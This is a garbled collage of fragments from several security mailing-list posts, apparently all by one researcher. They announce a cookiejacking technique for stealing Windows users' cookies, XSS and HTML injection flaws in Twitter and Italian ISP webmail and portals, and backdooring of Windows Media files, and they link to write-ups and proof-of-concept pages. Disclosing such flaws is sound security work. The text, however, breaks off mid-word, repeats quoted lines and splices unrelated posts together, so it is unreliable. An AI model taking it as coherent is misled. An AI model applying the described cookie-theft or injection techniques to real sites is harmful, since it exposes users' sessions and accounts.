> > y cookie (http only, secure cookies, whatever the website)
> > of every Win user!
> >
> > If it is interesting, on my blog you can find a writeup and a couple of
> > videos.
> > https://sites.google.com/site/tentacoloviola/cookiejacking
> >
> > Regards
> >
kies.
You can steal any cookie (http only, secure cookies, whatever the website)
of every Win user!
If it is interesting, on my blog you can find a writeup and a couple of
videos.
https://sites.google.com/site/tentacoloviola/cookiejacking
Regards
Rosario Val
an OWA user.
Regards,
Rosario Valotta
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
in the error page has been patched by Twitter a few days after
our disclosure.
The Unicode issue is still there.
Regards
Rosario Valotta + Matteo Carlo
___
scanning in an Intranet environment
All the details are available at:
http://sites.google.com/site/tentacoloviola/backdooring-windows-media-files
Regards
Rosario Valotta
___
oglepages.com
After notification, ANSA IT department has solved the issues.
Regards,
Rosario Valotta
___
found at:
http://rosario.valotta.googlepages.com/home
Regards,
Rosario Valotta
rosario dot valotta at gmail.com
___
Tiscali.it (big Italian ISP) webmail is affected by a severe vulnerability;
in the email composer a user is allowed to insert a hyperlink specifying
the link URL. This feature can be used to inject malicious HTML code in the
form, allowing the execution of arbitrary code.
On the submitted URL some
POC (until not deleted) can be found at:
http://digilander.libero.it/testxss/demo/img.htm
http://digilander.libero.it/testxss/demo/img2.htm
Both require that you're logged in to the Libero Community.
Greetings,
Rosario Valotta
rosario.valotta at gmail dot com
<---end-->
__
<--start-->
Following the advisory of the XSS vulnerability found on Libero.it
(Italian ISP) portal,
and after the "official" response given by the portal owners which
stated that in no way user accounts would be at risk,
several other XSS vulns have been found on Libero.it/Infostrada.it
portals (b
Greetings,
Rosario Valott